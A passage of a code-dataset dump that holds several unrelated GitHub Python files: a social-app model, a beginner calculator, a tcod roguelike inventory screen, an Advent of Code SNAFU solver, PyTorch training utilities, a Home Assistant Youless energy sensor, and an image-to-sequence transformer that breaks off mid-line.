self.content,\n \"image\": self.image,\n \"createdAt\": self.created_at,\n \"User\": self.user_author.to_dict(),\n \"Comments\": test,\n \"Comments_Count\": len(test),\n \"Like_Count\": len(self.likes)\n }\n","repo_name":"calvintzeng96/Tzengbook","sub_path":"app/models/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"70120210711","text":"#Basic Calc2 to junior users\n#Developer: Alex Basante\n\n#Libraries#########################\nimport os\n###################################\n\n\n#Funtions#########################\ndef calc(x, y):\n suma= x + y\n print(\"La suma es: \", suma)\n \n#Main######################### \nos.system(\"clear\") \nprint(\"Press number 1: \")\na=int(input())\n\nb=int(input(\"Presss number 2: 
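# Sketch with hypothetical ids (assumes a Flask app context): the three serializers
# on the Post model above let each endpoint pay only for what it needs - to_dict()
# for plain feeds, the *_with_comments variants when a thread view needs comment
# and like counts.
post = Post.query.get(1)
payload = post.to_dict_with_comments_likes()  # adds Comments_Count and Like_Count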
\"))\n\ncalc(a,b)","repo_name":"Alexb2322/appTest7","sub_path":"basic_calc2.py","file_name":"basic_calc2.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37198268183","text":"from enum import Enum\n\nimport tcod\n\nfrom input import InputType\nfrom messages.messages import get_message\nfrom render import screen_width, screen_height\nfrom scene.generic_scene import GenericScene\n\n\nclass InventoryMode(Enum):\n USE = 1\n DESCRIPTION = 2\n DROP = 3\n\n\nclass InventoryScene(GenericScene):\n def __init__(self, player, previous_scene=None, mode=InventoryMode.DESCRIPTION):\n super().__init__()\n self.player = player\n self.previous_scene = previous_scene\n self.mode = mode\n self.item = None\n self.console = tcod.console_new(screen_width, screen_height)\n tcod.console_set_default_foreground(self.console, tcod.white)\n tcod.console_set_default_background(self.console, tcod.black)\n\n def manage_input(self, game_input):\n super_input = super().manage_input(game_input)\n if super_input is not None:\n if super_input['action'] == 'cancel' and self.item is not None:\n self.item = None\n self.render_next = True\n return None\n return super_input\n\n if game_input is None:\n return None\n\n if game_input.type == InputType.CHAR:\n if game_input.value == '?':\n if self.mode == InventoryMode.USE:\n self.mode = InventoryMode.DESCRIPTION\n elif self.mode == InventoryMode.DESCRIPTION:\n self.mode = InventoryMode.DROP\n else:\n self.mode = InventoryMode.USE\n elif (ord('a') <= ord(game_input.value) <= ord('z')) \\\n or (ord('A') <= ord(game_input.value) <= ord('Z')):\n item = self.player.entity.inventory.get_item_at_char(game_input.value)\n if item is not None:\n if self.mode == InventoryMode.DESCRIPTION:\n self.item = item\n elif self.mode == InventoryMode.USE and item.usable:\n item.use()\n self.player.entity.inventory.remove_item(item)\n self.player.entity.reset_turn(100)\n return {'action': 'cancel'}\n elif self.mode == InventoryMode.DROP:\n self.player.entity.inventory.drop_item(item)\n self.player.entity.reset_turn(100)\n return {'action': 'cancel'}\n\n self.render_next = True\n return None\n\n def render(self, console):\n if not self.render_next:\n return\n tcod.console_clear(self.console)\n\n if self.item is None:\n self.render_list()\n\n tcod.console_blit(self.console, 0, 0, screen_width, screen_height, 0, 0, 0)\n\n def render_list(self):\n tcod.console_set_default_foreground(self.console, tcod.white)\n if self.mode == InventoryMode.DESCRIPTION:\n message = get_message('inventory.description')\n elif self.mode == InventoryMode.DROP:\n message = get_message('inventory.drop')\n else:\n message = get_message('inventory.use')\n tcod.console_print_ex(\n self.console,\n 1,\n 1,\n tcod.BKGND_NONE,\n tcod.LEFT,\n message\n )\n\n index = 0\n for item in self.player.entity.inventory.items:\n letter_index = ord('a') + index\n if letter_index > ord('z'):\n letter_index = ord('A') + index - 26\n\n if item.usable or self.mode != InventoryMode.USE:\n color = item.get_color()\n message = '{0}) {1}'\n else:\n color = tcod.dark_grey\n message = ' {1}'\n\n tcod.console_set_default_foreground(self.console, color)\n tcod.console_print_ex(\n self.console,\n 2,\n 3 + index,\n tcod.BKGND_NONE,\n tcod.LEFT,\n message.format(chr(letter_index), item.get_name())\n )\n index += 1\n\n if self.mode == InventoryMode.DESCRIPTION:\n message = get_message('inventory.switch_mode.drop')\n elif self.mode == InventoryMode.DROP:\n 
message = get_message('inventory.switch_mode.use')\n else:\n message = get_message('inventory.switch_mode.description')\n\n tcod.console_set_default_foreground(self.console, tcod.desaturated_green)\n tcod.console_print_ex(\n self.console,\n 1,\n 55,\n tcod.BKGND_NONE,\n tcod.LEFT,\n message.format('?')\n )\n\n def render_clean(self, console):\n if not self.render_next:\n return\n tcod.console_clear(self.console)\n self.render_next = False\n","repo_name":"gbouchez/roguemonsters","sub_path":"scene/inventory_scene.py","file_name":"inventory_scene.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23251944256","text":"from .utils import Answer\n\nvalues = [\"=\", \"-\", \"0\", \"1\", \"2\"]\n\ndef snafu2int(s: str):\n return sum(\n (values.index(c) - 2) * (5 ** i)\n for i, c in enumerate(reversed(s))\n )\n\ndef int2snafu(i: int) -> str:\n ret = ''\n while i:\n m = i % 5\n i //= 5\n if m > 2: # carry\n m -= 5\n i += 1\n ret = values[m+2] + ret\n return ret\n\ndef solve(input: str):\n total = sum(map(snafu2int, input.split()))\n part1 = int2snafu(total)\n return Answer(part1, 0)\n","repo_name":"barnybug/aoc2022","sub_path":"aoc2022/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9473866574","text":"import shutil\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\nimport os\n\n\ndef save_checkpoint(state, is_best, best_prec1, save_dir='.', suffix=''):\n \"\"\"\n Save the training self.model\n \"\"\"\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n filename = \"{}/checkpoint{}.pth.tar\".format(save_dir, suffix)\n torch.save(state, filename)\n\n if is_best:\n shutil.copyfile(filename, '{}/model_best{}_acc_{:.4f}.pth.tar'.format(save_dir, suffix,best_prec1))\n\n\ndef rm_checkpoints(save_dir):\n for f_name in os.listdir(save_dir):\n if \"checkpoint\" in f_name and \".pth.tar\" in f_name:\n os.remove(os.path.join(save_dir, f_name))\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n self.values = []\n\n def update(self, val, n=1):\n self.values += [val]\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def get_var(self):\n return np.var(self.values)\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\ndef loss_fn(outputs, labels):\n \"\"\"\n Compute the cross entropy loss given outputs and labels.\n Args:\n outputs: (Variable) dimension batch_size x 6 - output of the model\n labels: (Variable) dimension batch_size, where each element is a value in [0, 1, 2, 3, 4, 5]\n Returns:\n loss (Variable): cross entropy loss for all images in the batch\n Note: you may use a standard loss function from http://pytorch.org/docs/master/nn.html#loss-functions. 
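# Round-trip sketch for the SNAFU codec above; "2=-01" is the worked example
# (decimal 976) from the Advent of Code 2022 day 25 statement. int2snafu(0)
# returns '', so the range check starts at 1.
assert snafu2int("2=-01") == 976
assert int2snafu(976) == "2=-01"
assert all(snafu2int(int2snafu(n)) == n for n in range(1, 1000))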
This example\n demonstrates how you can easily define a custom loss function.\n \"\"\"\n return nn.CrossEntropyLoss()(outputs, labels)\n\n\ndef loss_fn_kd(outputs, labels, teacher_outputs, params):\n \"\"\"\n Compute the knowledge-distillation (KD) loss given outputs, labels.\n \"Hyperparameters\": temperature and alpha\n NOTE: the KL Divergence for PyTorch comparing the softmaxs of teacher\n and student expects the input tensor to be log probabilities! See Issue #2\n \"\"\"\n alpha = params.alpha\n T = params.temperature\n KD_loss = nn.KLDivLoss()(F.log_softmax(outputs / T, dim=1),\n F.softmax(teacher_outputs / T, dim=1)) * (alpha * T * T) + \\\n F.cross_entropy(outputs, labels) * (1. - alpha)\n\n return KD_loss\n\n\ndef l1_penalty(scaler_params):\n '''\n Args:\n scales - diagonal matrix, which contains weight coefficients for branches in ResNeXt block\n '''\n l1 = torch.mean(torch.tensor([torch.abs(v).sum() for v in scaler_params.values()]))\n return l1\n\n\ndef adjust_learning_rate(optimizer, epoch, lr0=None):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n\n lr = lr0 * (0.99 ** (epoch // 30))\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return lr\n\n\ndef validate(val_loader, model, device='cuda',\n iters=10 ** 7, suffix='', prefix=\"Test\",\n loggs_dir=None, print_every=10):\n \"\"\"\n Run evaluation\n \"\"\"\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n criterion = torch.nn.CrossEntropyLoss().to(device)\n\n # switch to evaluate mode\n model.to(device)\n model.eval()\n\n with torch.no_grad():\n for i, (input, target) in enumerate(val_loader):\n iter_no = i + 1\n input = input.to(device)\n target = target.to(device)\n\n # compute output\n begin = time.time()\n output = model(input)\n batch_time.update(time.time() - begin)\n\n loss = criterion(output, target)\n\n # measure accuracy and record loss\n prec1, prec5 = accuracy(output, target, topk=(1, 5))\n losses.update(loss.item(), input.size(0))\n top1.update(prec1[0], input.size(0))\n top5.update(prec5[0], input.size(0))\n\n print_info = ''.join(['{0}: [{1}/{2}]\\t',\n 'ElapsedTime {batch_time.val:.6f} ({batch_time.avg:.6f})\\t',\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t',\n 'Prec@1 {top1.val:.6f} ({top1.avg:.6f})\\t',\n 'Prec@5 {top5.val:.6f} ({top5.avg:.6f})\\n']).format(prefix,\n iter_no * len(input),\n len(val_loader.sampler),\n batch_time=batch_time,\n loss=losses,\n top1=top1,\n top5=top5)\n\n if loggs_dir is not None:\n loggs_file = '{}/val_loggs{}.txt'.format(loggs_dir, suffix)\n with open(loggs_file, 'a') as f:\n f.write(print_info)\n\n if i % 100 == 0:\n print('Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n loss=losses,top1=top1, top5=top5))\n\n print(' * Prec@1 {top1.avg:.6f} Prec@5 {top5.avg:.6f}'\n .format(top1=top1, top5=top5))\n\n return top1.avg, top5.avg, losses.avg\n\n\ndef train(train_loader, model, teacher_model,\n optimizer, epoch, kd_params=None,\n device='cuda', iters=10 ** 7, add_l1_penalty=False,\n suffix='', loggs_dir=None, print_every=20):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to train mode\n model.to(device)\n model.train()\n\n if kd_params is not None:\n teacher_model.to(device)\n teacher_model.eval()\n\n for i, (input, target) in enumerate(train_loader):\n iter_no = i + 1\n\n input = 
input.to(device)\n target = target.to(device)\n\n # compute output\n begin = time.time()\n output = model(input)\n\n if kd_params is not None:\n teacher_output = teacher_model(input)\n loss = loss_fn_kd(output, target, teacher_output, kd_params) + loss_fn(output, target)\n else:\n loss = loss_fn(output, target)\n\n scaler_params = {k: v for k, v in dict(model.named_parameters()).items() if k.endswith('scaler.weight')}\n l1_loss = l1_penalty(scaler_params)\n\n\n\n\n if add_l1_penalty:\n loss = loss + 0.0001 * l1_loss\n\n batch_time.update(time.time() - begin)\n\n # measure accuracy and record loss\n prec1, prec5 = accuracy(output, target, topk=(1, 5))\n losses.update(loss.item(), input.size(0))\n top1.update(prec1[0], input.size(0))\n top5.update(prec5[0], input.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n print_info = ''.join(['Epoch: [{0}][{1}/{2}]\\t',\n 'ElapsedTime {batch_time.val:.6f} ({batch_time.avg:.6f})\\t',\n 'LoadingTime {data_time.val:.6f} ({data_time.avg:.6f})\\t',\n 'Loss {loss.val:.6f} ({loss.avg:.6f})\\t',\n 'Prec@1 {top1.val:.6f} ({top1.avg:.6f})\\t',\n 'Prec@5 {top5.val:.6f} ({top5.avg:.6f})\\n']).format(epoch ,\n (i + 1) * len(input),\n len(train_loader.sampler),\n batch_time=batch_time,\n data_time=data_time,\n loss=losses,\n top1=top1,\n top5=top5)\n if loggs_dir is not None:\n loggs_file = '{}/train_loggs{}.txt'.format(loggs_dir, suffix)\n with open(loggs_file, 'a') as f:\n f.write(print_info)\n\n if i % 100 == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n epoch, (i+1)*len(input), len(train_loader.sampler), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5))\n","repo_name":"chatzikon/DNN-COMPRESSION","sub_path":"ilscvr/step2/tensor_compression/train_validate.py","file_name":"train_validate.py","file_ext":"py","file_size_in_byte":9877,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"5"} +{"seq_id":"37405823109","text":"\"\"\"\n@ Author : Gerben Jongerius, Paul de Wit, Robin Harmsen\n@ Date : 04/29/2018, 11/01/2018, 04/29/2019\n@ Description : Youless Sensor - Monitor power consumption. 
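# Toy check of accuracy() above: logits for a 3-sample, 5-class batch whose top-1
# guess is right for 2 of 3 samples, so prec@1 is ~66.67 and prec@5 is 100.
import torch

logits = torch.tensor([[9., 0., 0., 0., 0.],
                       [0., 9., 0., 0., 0.],
                       [9., 0., 0., 0., 0.]])
targets = torch.tensor([0, 1, 2])
prec1, prec5 = accuracy(logits, targets, topk=(1, 5))
print(prec1.item(), prec5.item())  # ~66.67 100.0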
\n\"\"\"\nVERSION = '2.0.1'\n\nimport json\nimport logging\nfrom datetime import timedelta\nfrom urllib.request import urlopen\n\nimport voluptuous as vol\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.const import CONF_MONITORED_VARIABLES\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.util import Throttle\n\nDOMAIN = 'youless'\nCONF_HOST = \"host\"\n\nSENSOR_PREFIX = 'youless_'\n_LOGGER = logging.getLogger(__name__)\n\nCONFIG_SCHEMA = vol.Schema({\n DOMAIN: vol.Schema({\n vol.Required(CONF_HOST): cv.string,\n vol.Optional(CONF_MONITORED_VARIABLES, default=['pwr', 'net']): vol.All(\n cv.ensure_list, vol.Length(min=1), [vol.In(['pwr', 'net', 'p1', 'p2', 'n1', 'n2', 'cs0', 'ps0', 'gas'])])\n })\n}, extra=vol.ALLOW_EXTRA)\n\nSENSOR_TYPES = {\n 'pwr': ['Current Power usage', 'current_power_usage', 'W', 'mdi:flash', 'energy.png'],\n 'net': ['Net Power usage', 'net_power_meter', 'kWh', 'mdi:gauge', 'electric-meter.png'],\n 'p1': ['Power Meter Low', 'power_meter_low', 'kWh', 'mdi:gauge', 'energy.png'],\n 'p2': ['Power Meter High', 'power_meter_high', 'kWh', 'mdi:gauge', 'energy.png'],\n 'n1': ['Power Delivery Low', 'power_delivery_low', 'kWh', 'mdi:gauge', 'energy.png'],\n 'n2': ['Power Delivery High', 'power_delivery_high', 'kWh', 'mdi:gauge', 'energy.png'],\n 'cs0': ['Power Meter Extra', 'power_meter_extra', 'kWh', 'mdi:gauge', 'energy.png'],\n 'ps0': ['Current Power usage Extra', 'current_power_usage_extra', 'W', 'mdi:flash', 'energy.png'],\n 'gas': ['Gas consumption', 'gas_meter', 'm3', 'mdi:gas-cylinder', 'electric-meter.png']\n}\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n host = config.get(CONF_HOST)\n sensors = config.get(CONF_MONITORED_VARIABLES)\n data_bridge = YoulessDataBridge(host)\n\n devices = []\n for sensor in sensors:\n sensor_config = SENSOR_TYPES[sensor]\n devices.append(YoulessSensor(data_bridge, sensor_config[0], sensor, sensor_config[1], sensor_config[2], sensor_config[3], sensor_config[4]))\n\n add_devices(devices)\n\n\nclass YoulessDataBridge(object):\n\n def __init__(self, host):\n self._url = 'http://' + host + '/e'\n self._data = None\n\n def data(self):\n return self._data\n\n @Throttle(timedelta(seconds=1))\n def update(self):\n raw_res = urlopen(self._url)\n self._data = json.loads(raw_res.read().decode('utf-8'))[0]\n\n\nclass YoulessSensor(Entity):\n\n def __init__(self, data_bridge, name, prpt, sensor_id, uom, icon, image_uri):\n self._state = None\n self._name = name\n self._property = prpt\n self._icon = icon\n #self._image = image_uri\n self._uom = uom\n self._data_bridge = data_bridge\n self.entity_id = 'sensor.' 
+ SENSOR_PREFIX + sensor_id\n self._raw = None\n\n @property\n def name(self):\n return self._name\n\n @property\n def icon(self):\n return self._icon\n\n #@property\n #def entity_picture(self):\n # return '/local/youless/' + self._image\n\n @property\n def unit_of_measurement(self):\n return self._uom\n\n @property\n def state(self):\n return self._state\n\n @property\n def state_attributes(self):\n if self._raw is not None:\n return {\n 'timestamp': self._raw['tm']\n }\n\n def update(self):\n self._data_bridge.update()\n self._raw = self._data_bridge.data()\n if self._raw is not None:\n self._state = self._raw[self._property]\n","repo_name":"lubbertkramer/home_assistant_config","sub_path":"custom_components/youless/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"4280512033","text":"from model.Extractor import FeaturesExtractor\nfrom typing import Optional, NewType\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import Tensor\nfrom torch.nn import Dropout, LayerNorm, Linear\n\nfrom model.MultiHeadedAttention import MultiHeadedAttention, multiLinear, clones\nfrom model.PositionalEncoding import PositionalEncodingNd\nfrom model.TokenEmbedding import TokenEmbedding\n\n\nPAD_ID = 0\npretrained = \"model weights\"\n\nclass EncoderLayer(nn.Module):\n '''\n\n '''\n def __init__(self, d_model: int, nhead: int, dim_feedforward: int=2048, dropout: float=0.1, activation: str=\"relu\"):\n super(EncoderLayer, self).__init__()\n self.self_attn = MultiHeadedAttention(d_model=d_model, nhead=nhead, dropout=dropout)\n # Implementation of Feedforward model\n self.linear1 = Linear(d_model, dim_feedforward)\n self.dropout = Dropout(dropout)\n self.linear2 = Linear(dim_feedforward, d_model)\n\n self.norm1 = LayerNorm(d_model)\n self.norm2 = LayerNorm(d_model)\n self.dropout1 = Dropout(dropout)\n self.dropout2 = Dropout(dropout)\n\n self.activation = _get_activation_fn(activation)\n\n def __setstate__(self, state):\n if 'activation' not in state:\n state['activation'] = F.relu(inplace=True)\n super(EncoderLayer, self).__setstate__(state)\n\n def forward(self, src: Tensor, src_mask: Optional[Tensor] = None, src_padding_mask: Optional[Tensor] = None) -> Tensor:\n \"\"\"Pass the input through the encoder layer.\n\n Args:\n src: the sequence to the encoder layer (required).\n src_mask: the mask for the src sequence (optional).\n src_key_padding_mask: the mask for the src keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n src2 = self.self_attn(src, src, src, pos_mask=src_mask, padding_mask=src_padding_mask)\n src = src + self.dropout1(src2)\n src = self.norm1(src)\n src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))\n src = src + self.dropout2(src2)\n src = self.norm2(src)\n return src\n\n\nclass DecoderLayer(nn.Module):\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"):\n super(DecoderLayer, self).__init__()\n\n self.d_model = d_model\n\n self.self_attn = MultiHeadedAttention(d_model=d_model, nhead=nhead, dropout=dropout)\n self.src_attn = MultiHeadedAttention(d_model=d_model, nhead=nhead, dropout=dropout)\n\n # (tgt, tgt, tgt)\n self.self_attn_linears = multiLinear(d_model=d_model, num=3)\n # (tgt, memory, memory)\n self.src_attn_linears = multiLinear(d_model=d_model, num=3)\n self.self_attn_memory = None\n self.src_attn_memory = None\n\n # 
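# Sketch of the shared-bridge pattern above (hypothetical host address): every
# YoulessSensor shares one YoulessDataBridge, and @Throttle collapses the update()
# calls so http://<host>/e is polled at most once per second while all sensors
# read the same cached JSON record.
bridge = YoulessDataBridge('192.168.1.50')
bridge.update()
if bridge.data() is not None:
    print(bridge.data()['pwr'])  # instantaneous power draw in W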
Implementation of Feedforward model\n self.linear1 = Linear(d_model, dim_feedforward)\n self.dropout = Dropout(dropout, inplace=True)\n self.linear2 = Linear(dim_feedforward, d_model)\n\n self.norm1 = LayerNorm(d_model)\n self.norm2 = LayerNorm(d_model)\n self.norm3 = LayerNorm(d_model)\n self.dropout1 = Dropout(dropout)\n self.dropout2 = Dropout(dropout)\n self.dropout3 = Dropout(dropout)\n\n self.activation = _get_activation_fn(activation)\n\n def __setstate__(self, state):\n if 'activation' not in state:\n state['activation'] = F.relu(inplace=True)\n super(DecoderLayer, self).__setstate__(state)\n\n def forward(self, tgt: Tensor, memory: Tensor, \n tgt_mask: Optional[Tensor] = None, tgt_paddingg_mask: Optional[Tensor] = None, \n memory_mask: Optional[Tensor] = None, memory_padding_mask: Optional[Tensor] = None,\n decode_mem: Optional[list] = None) -> Tensor:\n '''\n :param tgt: target. shape: (barch_size, max_len, d_model)\n '''\n if decode_mem is not None:\n memk1, memv1, memk2, memv2 = decode_mem\n\n q, k, v = self.self_attn_linears(tgt, tgt, tgt)\n if decode_mem is not None:\n k, v = [torch.cat((x, y), dim=1) for x, y in zip([memk1, memv1], [k, v])]\n self.self_attn_memory = [k, v]\n tgt2 = self.self_attn(q, k, v, pos_mask=tgt_mask, padding_mask=tgt_paddingg_mask)\n\n tgt = tgt + self.dropout1(tgt2)\n tgt = self.norm1(tgt)\n\n q, k, v = self.src_attn_linears(tgt, memory, memory)\n if decode_mem is not None:\n k, v = [torch.cat((x, y), dim=1) for x, y in zip([memk2, memv2], [k, v])]\n self.src_attn_memory = [k, v]\n tgt2 = self.src_attn(q, k, v, pos_mask=memory_mask, padding_mask=memory_padding_mask)\n\n tgt = tgt + self.dropout2(tgt2)\n tgt = self.norm2(tgt)\n tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt))))\n tgt = tgt + self.dropout3(tgt2)\n tgt = self.norm3(tgt)\n return tgt\n\n def clear_cache(self):\n self.self_attn_memory = None\n self.src_attn_memory = None\n\n def init_decode_memory(self, memory: Tensor, device) -> 'list[Tensor]':\n batch_size = memory.shape[0]\n return [init_empty_tensor(batch_size=batch_size, d_model=self.d_model, device=device), \n init_empty_tensor(batch_size=batch_size, d_model=self.d_model, device=device)] + \\\n self.src_attn_linears(\n init_empty_tensor(batch_size=batch_size, d_model=self.d_model, device=device), \n memory, memory\n )[1:]\n\n def display(self, displaying):\n self.src_attn.display(displaying)\n \n def get_attention(self) -> Tensor:\n return self.src_attn.get_attention()\n\nclass TransformerEncoder(nn.Module):\n \"\"\"TransformerEncoder is a stack of N encoder layers\n\n Args:\n encoder_layer: an instance of the TransformerEncoderLayer() class (required).\n num_layers: the number of sub-encoder-layers in the encoder (required).\n norm: the layer normalization component (optional).\n\n \"\"\"\n __constants__ = ['norm']\n\n def __init__(self, encoder_layer: EncoderLayer, num_layers: int, norm=None):\n super(TransformerEncoder, self).__init__()\n self.layers = clones(encoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n self.displaying = False\n self.encoder_output = None\n\n def forward(self, src: Tensor, src_mask: Optional[Tensor] = None, src_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n \"\"\"Pass the input through the encoder layers in turn.\n\n Args:\n src: the sequence to the encoder (required).\n mask: the mask for the src sequence (optional).\n src_key_padding_mask: the mask for the src keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n 
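# Sketch of the incremental-decoding cache used by DecoderLayer above: at step t
# only the newest token is projected, and its key/value rows are concatenated onto
# the cached rows for steps 0..t-1 along dim=1 (the sequence dimension).
import torch

cached_k = torch.randn(2, 7, 512)  # (batch, previous steps, d_model)
new_k = torch.randn(2, 1, 512)     # projection of the current token only
print(torch.cat((cached_k, new_k), dim=1).shape)  # torch.Size([2, 8, 512])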
output = src\n if self.displaying:\n self.encoder_output = []\n for mod in self.layers:\n output = mod(output, src_mask=src_mask, src_padding_mask=src_key_padding_mask)\n if self.displaying:\n self.encoder_output.append(output)\n\n if self.norm is not None:\n output = self.norm(output)\n\n return output\n \n def get_encoder_output(self):\n if self.displaying:\n return self.encoder_output\n else:\n raise Exception('Not display mode! Cannot get the encoder outputs.')\n\n def display(self, displaying):\n self.displaying = displaying\n if not displaying:\n self.encoder_output = None\n\n\nclass TransformerDecoder(nn.Module):\n \"\"\"TransformerDecoder is a stack of N decoder layers\n\n Args:\n decoder_layer: an instance of the TransformerDecoderLayer() class (required).\n num_layers: the number of sub-decoder-layers in the decoder (required).\n norm: the layer normalization component (optional).\n\n \"\"\"\n __constants__ = ['norm']\n\n def __init__(self, decoder_layer: DecoderLayer, num_layers: int, norm=None):\n super(TransformerDecoder, self).__init__()\n self.layers = clones(decoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n self.displaying = False\n self.decoder_output = []\n\n def forward(self, tgt: Tensor, memory: Tensor, \n tgt_mask: Optional[Tensor] = None, memory_mask: Optional[Tensor] = None, \n tgt_key_padding_mask: Optional[Tensor] = None, memory_key_padding_mask: Optional[Tensor] = None,\n decode_mem_list: Optional[list] = None) -> Tensor:\n \"\"\"Pass the inputs (and mask) through the decoder layer in turn.\n\n Args:\n tgt: the sequence to the decoder (required).\n memory: the sequence from the last layer of the encoder (required).\n tgt_mask: the mask for the tgt sequence (optional).\n memory_mask: the mask for the memory sequence (optional).\n tgt_key_padding_mask: the mask for the tgt keys per batch (optional).\n memory_key_padding_mask: the mask for the memory keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n output = tgt\n if self.displaying:\n self.decoder_output = []\n for i in range(self.num_layers):\n mod = self.layers[i]\n decode_mem = decode_mem_list[i] if decode_mem_list is not None else None\n output = mod(\n output, memory, \n tgt_mask=tgt_mask, tgt_paddingg_mask=tgt_key_padding_mask,\n memory_mask=memory_mask, memory_padding_mask=memory_key_padding_mask,\n decode_mem=decode_mem\n )\n if self.displaying:\n self.decoder_output.append(output)\n if decode_mem_list is not None:\n decode_mem_list[i] = mod.self_attn_memory + mod.src_attn_memory\n \n if self.norm is not None:\n output = self.norm(output)\n\n return output\n \n def init_decode_memory(self, memory: Tensor, device) -> 'list[list[Tensor]]':\n decode_mem_list = [\n self.layers[i].init_decode_memory(memory=memory, device=device)\n for i in range(self.num_layers)\n ]\n return decode_mem_list\n\n def display(self, displaying):\n self.displaying = displaying\n if not displaying:\n self.decoder_output = None\n for mod in self.layers:\n mod.display(displaying)\n\n def get_attention(self) -> 'list[Tensor]':\n return [mod.get_attention() for mod in self.layers]\n\n def get_decoder_output(self):\n if self.displaying:\n return self.decoder_output\n else:\n raise Exception('Not display mode! 
Cannot get the decoder outputs.')\n \n def clear_cache(self):\n for i in range(self.num_layers):\n self.layers[i].clear_cache()\n\n\nclass Img2SeqTransformer(nn.Module):\n def __init__(self, feature_size: 'tuple[int, int]', extractor_name: str, pretrain: str,\n max_seq_len: int, tr_extractor: bool, num_encoder_layers: int, \n num_decoder_layers: int, d_model: int, nhead: int, vocab_size: int,\n dim_feedforward: int = 1024, dropout: float = 0.1, device: str='cpu'):\n super(Img2SeqTransformer, self).__init__()\n self.device = device\n self.d_model = d_model\n self.features_extractor = FeaturesExtractor(num_features=d_model, output_size=feature_size, \n extractor_name=extractor_name, pretrain=pretrain, tr_extractor=tr_extractor)\n encoder_layer = EncoderLayer(d_model=d_model, nhead=nhead,\n dim_feedforward=dim_feedforward, dropout=dropout)\n self.transformer_encoder = TransformerEncoder(encoder_layer, num_layers=num_encoder_layers)\n decoder_layer = DecoderLayer(d_model=d_model, nhead=nhead,\n dim_feedforward=dim_feedforward, dropout=dropout)\n self.transformer_decoder = TransformerDecoder(decoder_layer, num_layers=num_decoder_layers)\n\n self.generator = Linear(d_model, vocab_size)\n self.seq_emb = TokenEmbedding(vocab_size, d_model)\n self.positional_encoding_seq = PositionalEncodingNd(d_pos=1, max_size=max_seq_len, d_model=d_model, dropout=dropout)\n\n self.displaying = False\n self.feature = None\n\n def forward(self, img: Tensor, seq: Tensor):\n memory = self.encode(img)\n return self.decode(seq, memory)\n\n def scst(self, run=True):\n if run:\n for param in self.transformer_encoder.parameters():\n param.requires_grad = False\n else:\n for param in self.transformer_encoder.parameters():\n param.requires_grad = True\n\n def encode(self, img: Tensor, ft_size: 'Optional[list[int, int]]'=None) -> Tensor:\n '''\n batch_size = img.shape[0]\n '''\n features = self.features_extractor(img)\n if self.displaying:\n self.feature = features\n batch_size, ft_h, ft_w, n_feature = features.shape\n if ft_size is not None:\n ft_size[0] = ft_h\n ft_size[1] = ft_w\n features = features.view(batch_size, -1, n_feature)\n return self.transformer_encoder(src=features, src_mask=None, src_key_padding_mask=None)\n\n def decode(self, seq: Tensor, memory: Tensor) -> Tensor:\n seq_emb = 